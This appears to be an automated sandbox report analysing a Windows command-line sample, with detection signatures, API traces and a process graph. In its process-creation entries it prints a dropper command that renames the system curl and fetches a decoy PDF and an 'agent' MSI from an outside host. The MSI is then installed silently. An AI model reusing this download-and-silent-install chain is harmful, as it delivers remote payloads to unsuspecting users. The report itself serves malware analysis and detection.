Windows Analysis Report

Overview

General Information

Analysis ID: 1528042
Infos:

Detection

Score: 8
Range: 0 - 100
Whitelisted: false
Confidence: 40%

Signatures

Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found decision node followed by non-executed suspicious APIs
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: Suspicious Copy From or To System Directory
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Uses Microsoft's Enhanced Cryptographic Provider
Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Classification

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4F860 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_00E4F860
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4F820 CryptAcquireContextA,CryptCreateHash, 3_2_00E4F820
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4F02B CertGetNameStringA,CertFindExtension,CryptDecodeObjectEx, 3_2_00E4F02B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E46400 CryptAcquireContextA,CryptGenRandom,CryptReleaseContext, 3_2_00E46400
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4EC10 malloc,CryptQueryObject,CertAddCertificateContextToStore,CertFreeCertificateContext,GetLastError,GetLastError, 3_2_00E4EC10
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E46591 CryptAcquireContextA,CryptCreateHash,CryptHashData,CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_00E46591
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4C6E0 malloc,CryptAcquireContextA,CryptCreateHash,CryptReleaseContext, 3_2_00E4C6E0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E43EA4 _strdup,fopen,free,fseek,ftell,fread,fclose,free,free,fseek,malloc,malloc,malloc,malloc,MultiByteToWideChar,PFXImportCertStore,free,free,free,free,GetLastError,CertFindCertificateInStore,GetLastError,CertCloseStore,free,CertOpenStore,GetLastError,free,free,free,free,free,CryptStringToBinaryA,free,CertFindCertificateInStore,free,CertCloseStore,calloc,calloc,CertFreeCertificateContext,CertFreeCertificateContext,free,free, 3_2_00E43EA4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4C750 CryptGetHashParam,CryptGetHashParam,CryptDestroyHash,CryptReleaseContext, 3_2_00E4C750
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4C730 CryptHashData, 3_2_00E4C730
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: -----BEGIN PUBLIC KEY----- 3_2_00E277F7
Source: TNheBOJElq.exe Binary or memory string: -----BEGIN PUBLIC KEY-----
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
Tries to resolve domain names, but no domain seems valid (expired dropper behavior)
Source: unknown DNS traffic detected: query: 241.42.69.40.in-addr.arpa replaycode: Name error (3)
Source: unknown UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1D8C0 recv,WSAGetLastError, 3_2_00E1D8C0
Source: TNheBOJElq.exe String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp String found in binary or memory: Usage: curl [options...] <url>
Source: TNheBOJElq.exe.0.dr String found in binary or memory: Usage: curl [options...] <url>
Source: global traffic DNS traffic detected: DNS query: 241.42.69.40.in-addr.arpa
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/P
Source: TNheBOJElq.exe, 00000003.00000000.1638229167.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641704004.0000000000E70000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/copyright.htmlD
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/hsts.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/hsts.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/http-cookies.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/http-cookies.html#
Source: TNheBOJElq.exe, TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/docs/sslcerts.html
Source: TNheBOJElq.exe String found in binary or memory: https://curl.se/docs/sslcerts.htmlcurl
Source: TNheBOJElq.exe.0.dr String found in binary or memory: https://curl.se/libcurl/c/curl_easy_setopt.html
Detected potential crypto function
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E11535 3_2_00E11535
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E3A8D8 3_2_00E3A8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E2C1FD 3_2_00E2C1FD
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1A9B3 3_2_00E1A9B3
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E0E127 3_2_00E0E127
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1FAEC 3_2_00E1FAEC
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4CAA0 3_2_00E4CAA0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E533B0 3_2_00E533B0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E14415 3_2_00E14415
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E225B8 3_2_00E225B8
Found potential string decryption / allocating functions
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E12564 appears 48 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E1D632 appears 245 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E120E6 appears 46 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E1D6AD appears 301 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E0913E appears 64 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E1201D appears 39 times
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: String function: 00E1251E appears 48 times
Source: classification engine Classification label: clean8.win@11/3@1/0
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E0310D CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next, 3_2_00E0310D
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6508:120:WilError_03
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: TNheBOJElq.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: TNheBOJElq.exe String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: TNheBOJElq.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: TNheBOJElq.exe String found in binary or memory: curl: try 'curl --help' for more information
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /C ""C:\Windows\System32\cmd.exe" /c cd /d "C:\" & copy c:\windows\system32\curl.exe TNheBOJElq.exe & TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf & "C:\QMQjaBdqIo.pdf" & TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent & C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\"
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn
Source: unknown Process created: C:\Windows\System32\msiexec.exe C:\Windows\system32\msiexec.exe /V
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: ntmarta.dll Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: secur32.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: iphlpapi.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: mswsock.dll Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: mpr.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: srpapi.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: uxtheme.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: apphelp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: aclayers.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sfc_os.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: kernel.appcore.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: msi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: tsappcmp.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: userenv.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: profapi.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: sspicli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netapi32.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: wkscli.dll Jump to behavior
Source: C:\Windows\System32\msiexec.exe Section loaded: netutils.dll Jump to behavior
Source: Binary string: curl.pdb source: TNheBOJElq.exe, 00000003.00000000.1638165170.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000003.00000002.1639577660.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000000.1641054291.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe, 00000004.00000002.1641656492.0000000000E55000.00000002.00000001.01000000.00000003.sdmp, TNheBOJElq.exe.0.dr
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, 3_2_00E1D33A
Drops PE files
Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Jump to dropped file
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\msiexec.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Found decision node followed by non-executed suspicious APIs
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)
Found large amount of non-executed APIs
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe API coverage: 3.3 %
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
Source: TNheBOJElq.exe, 00000003.00000003.1638561356.00000000034C0000.00000004.00000020.00020000.00000000.sdmp, TNheBOJElq.exe, 00000004.00000003.1641387385.0000000003460000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E5155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00E5155B
Contains functionality to dynamically determine API calls
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1D33A GetModuleHandleA,GetProcAddress,_mbspbrk,LoadLibraryA,GetProcAddress,LoadLibraryExA,GetSystemDirectoryA,malloc,malloc,GetSystemDirectoryA,LoadLibraryA,free,free, 3_2_00E1D33A
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E50CB4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, 3_2_00E50CB4
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E5155B IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_00E5155B
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E516BE SetUnhandledExceptionFilter, 3_2_00E516BE
Creates a process in suspended mode (likely to inject code)
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd /d "C:\" Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o "C:\QMQjaBdqIo.pdf" hxxps://dbs5.pwods.com/download/pdf Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe TNheBOJElq.exe -o bLhLldebqq.msi hxxps://dbs5.pwods.com/download/agent Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\msiexec.exe C:\Windows\System32\msiexec.exe /i bLhLldebqq.msi /qn Jump to behavior
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Source: unknown Process created: C:\Windows\SysWOW64\cmd.exe cmd /c ""c:\windows\system32\cmd.exe" /c cd /d "c:\" & copy c:\windows\system32\curl.exe tnhebojelq.exe & tnhebojelq.exe -o "c:\qmqjabdqio.pdf" hxxps://dbs5.pwods.com/download/pdf & "c:\qmqjabdqio.pdf" & tnhebojelq.exe -o blhlldebqq.msi hxxps://dbs5.pwods.com/download/agent & c:\windows\system32\msiexec.exe /i blhlldebqq.msi /qn"
Contains functionality to query CPU information (cpuid)
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E5137A cpuid 3_2_00E5137A
Queries the volume information (name, serial number etc) of a device
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe Queries volume information: C:\ VolumeInformation Jump to behavior
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E51775 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter, 3_2_00E51775
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E3A8D8 calloc,calloc,___from_strstr_to_strchr,___from_strstr_to_strchr,inet_pton,strncpy,___from_strstr_to_strchr,strtoul,___from_strstr_to_strchr,strtoul,getsockname,WSAGetLastError,free,free,WSAGetLastError,htons,bind,WSAGetLastError,getsockname,WSAGetLastError,getsockname,WSAGetLastError,listen,WSAGetLastError,htons,free,free, 3_2_00E3A8D8
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E4699F socket,htonl,setsockopt,bind,getsockname,listen,socket,connect,ioctlsocket,accept,getsockname,getpeername,closesocket,closesocket,closesocket,closesocket, 3_2_00E4699F
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E38490 calloc,calloc,calloc,calloc,calloc,calloc,bind,WSAGetLastError, 3_2_00E38490
Source: C:\Program Files (x86)\AutoIt3\TNheBOJElq.exe Code function: 3_2_00E1DEDF strncmp,strncmp,inet_pton,inet_pton,htons,htons,htons,bind,getsockname,WSAGetLastError,WSAGetLastError, 3_2_00E1DEDF
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1528042 Cookbook: defaultwindowscmdlinecookbook.jbs Startdate: 07/10/2024 Architecture: WINDOWS Score: 8 21 241.42.69.40.in-addr.arpa 2->21 6 cmd.exe 2 2->6         started        9 msiexec.exe 2->9         started        process3 file4 19 C:\Program Files (x86)\...\TNheBOJElq.exe, PE32 6->19 dropped 11 conhost.exe 6->11         started        13 msiexec.exe 6->13         started        15 cmd.exe 1 6->15         started        17 2 other processes 6->17 process5
No contacted IP infos

Contacted Domains

Name IP Active
241.42.69.40.in-addr.arpa unknown unknown